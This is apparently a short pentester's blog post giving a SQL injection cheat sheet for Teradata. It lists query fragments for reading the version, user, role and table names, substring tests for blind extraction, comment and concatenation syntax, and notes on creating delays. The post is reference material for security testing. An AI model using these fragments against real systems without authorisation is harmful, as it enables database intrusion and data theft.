Open in app

Sign in

Write

Sign in

Teradata SQLi Cheatsheet

Ba Yin Min
1 min readApr 9, 2024

tl;dr — This is a SQL Injection cheat sheet for the Teradata database. This is still an initial version and not comprehensive enough yet.

So far, I have not come across SQLi cheat sheet for Teradata although there are excellent SQLi cheat sheets around from the sources such as Portswigger and Pentest Monkey (the classic one — Thanks!). In collaboration with Buckdover, we came up with a cheat sheet for Teradata to aid penetration testers and security researchers in finding vulnerabilities in effort to ramp up the application security posture for their customers and clients.

Version

SELECT InfoData FROM dbc.dbcinfo WHERE InfoKey = ‘Version’

Database

SELECT DATABASE

Current User

SELECT USER

Substring

SUBSTRING(<select statement>, 1, 1) = ‘A’

Comments

To comment off a statement, two dashes can be used.

--comment

String Concatenation

You can concatenate multiple string by using either double pipe characters or the Concat() function.

'S'||CONCAT('AMPLE','E')

Table Names

SELECT TableName FROM DBC.TablesV

Limit/Order By

SAMPLE 3

TOP 3

Current Role+

SELECT RoleName FROM dbc.RolesV WHERE RoleName = CURRENT_ROLE

Additional Notes

  • SEL can be used instead of SELECT.
  • No direct sleep/wait for function unless able to create stored procedures.
  • Delay could be created with an expensive query but may not have consistent results.
Sqli
Cheatsheet
Teradata
Database Security
Application Security

--

--

Ba Yin Min
Ba Yin Min

Written by Ba Yin Min

43 Followers
2 Following

Pentester. Application & Cyber Security enthusiast. Insatiable learner.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams